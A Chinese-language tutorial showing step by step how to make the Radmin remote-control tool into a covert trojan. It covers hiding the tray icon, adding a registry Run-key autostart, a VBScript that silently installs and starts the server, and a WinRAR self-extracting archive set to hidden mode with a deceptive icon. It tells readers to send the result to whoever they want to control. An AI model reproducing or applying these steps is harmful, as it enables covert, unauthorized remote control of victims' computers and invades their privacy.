一、radmin的配置
首先下载并解压Radmin。解压后有七个文件,打开“配置r_server”文件;
点选“注册信息”,把sn文件中的注册码复制粘贴到对话框中确定;
点击“设置密码”按钮进入设置密码窗口,为radmin设置不少于8位的密码后确定;
点选“设置参数”按钮进入设置参数窗口,选中“隐藏状态栏图标”前的复选框,端口可以改也可以默认,然后确定。
最后点“安装服务”,确定后退出。好,radmin的配置完毕。
二、导出注册表信息
因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序内,而是在相关的注册表键值内,所以我们要导出注册表中的radmin信息。
打开注册表编辑器(开始->运行->输入regedit后回车),依次展开“HKEY_LOCAL_MACHINE\SYSTEM\
Radmin”键值项,在“radmin”键值项上右击选择“导出”,保存为名为r_server.reg的文件。
再依次展开“HKEY_LOCAL_MACHINE\SOFTWAR
E\Microsoft\Windows\CurrentVersion\Run”,在右边的窗口空白处右键单击,依次选择“新建”、“字符串值”,为新建的字符串起个名字,比如radmin,再在其上双击,在弹出的对话框的“数值数据”处填入“C:\WINDOWS\system32\r_server.exe”(不包括引号)后确定,然后导出radmin项,名称为qidong.reg 。
到此radmin的前期准备工作就做好了,下面来把它打造成完美木马。
三、打造完美木马
打开记事本,输入以下代码:
set ws=wscript.createobject("wscript.shell")
ws.run "regedit.exe /s r_server.reg",0
ws.run "regedit.exe /s qidong.reg",0
ws.run "r_server.exe /install /silence",0
ws.run "r_server.exe /start",0
另存为yunxing.vbs。
把radmin32文件夹中的r_server.exe、AdmDll.dll、raddrv.dll三个文件以及r_server.reg、qidong.reg和刚才的yunxing.vbs共六个文件复制到同一目录下,然后同时选中它们,用鼠标选中这六个文件,单击鼠标右键,选择“添加到压缩文件”(前提是你安装了WINRAR)。
在弹出的对话框的“常规”选项卡的“存档选项”框中选中“创建自释放格式档案文件(X)”前的复选框,然后切换到“高级”选项卡,点选“SFX选项(X)”进入高级自释放选项设置:在这里的“常规”选项卡中的释放路径一栏处填入“C:\WINDOWS\system32”(不包括引号),在“释放后运行”里填入yunxing.vbs(注意填写文件扩展名)。再切换到“模式”选项卡,缄默模式设置成“全部隐藏”,覆盖方式设置成“覆盖所有文件”。切换到“文字和图标”选项卡,在“自定义SFX”框中点“浏览”选择一个迷惑性的图标。最后连续点击两次“确定”完成收尾工作。好,完美的木马已经打造完成,把这个木马传给你要控制的人,你就可以玩远程控制了。
四、radmin的使用
这里简单的说一下radmin的使用方法:打开Radmin.exe,选择“连接选项”->“连接到……”,在“连接类型”中选择你想要的功能,在“所连接的IP地址或DNS”中输入服务端的IP地址,然后点击“确定”,在弹出的对话框中输入你原先设置的密码,确定后就连接成功了。